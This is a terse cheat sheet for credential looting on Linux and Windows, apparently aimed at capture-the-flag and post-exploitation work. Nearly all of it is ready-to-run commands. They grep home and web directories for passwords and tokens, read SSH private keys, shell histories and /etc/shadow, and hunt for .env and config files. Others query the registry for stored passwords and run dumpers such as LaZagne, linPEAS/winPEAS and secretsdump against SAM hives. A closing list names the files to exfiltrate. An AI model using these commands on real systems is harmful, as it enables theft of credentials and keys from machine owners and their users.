LINUX CRED LOOTING
Quick Greps (Common dirs)
grep -Ri 'pass\|user\|key\|token' /home/*
grep -Ri 'password' /var/www/
strings * | grep -i pass
Common Files & Targets
cat ~/.bash_history
cat ~/.ssh/id_rsa
ls -la ~/.ssh/
cat /etc/passwd
cat /etc/shadow # (if root)
Config Files (often hold creds)
find / -name "*.php" 2>/dev/null
find / -name "*.conf" 2>/dev/null
find / -name ".env" 2>/dev/null
WINDOWS CRED LOOTING
File Targets
type %USERPROFILE%\Desktop\*.txt
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Registry Secrets
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query HKCU /f password /t REG_SZ /s
Files to Check
C:\Users\<user>\AppData\Roaming\Microsoft\CredentialsC:\Windows\System32\config\SAM(needs SYSTEM)
TOOLS (Dumpers & Search)
# LaZagne (Windows/Linux)
laZagne.exe all
# PEASS (post-ex, built-in looting)
linpeas.sh
winPEAS.bat
# Secretsdump (if you get SYSTEM)
secretsdump.py -sam SAM -system SYSTEM LOCAL
FILES TO EXFIL
~/.ssh/id_rsa
/root/.bash_history
/root/.mysql_history
webapp config files (db creds!)
/var/backups/
/etc/shadow
SAM/SYSTEM/SECURITY (Windows)
CTF Pro-Tips
.bash_history= gold.env,.git/config,.mysql_history,wp-config.php,config.phpCheck
/var/backups/for old passwd/shadow filesLook for user-level SSH keys you can reuse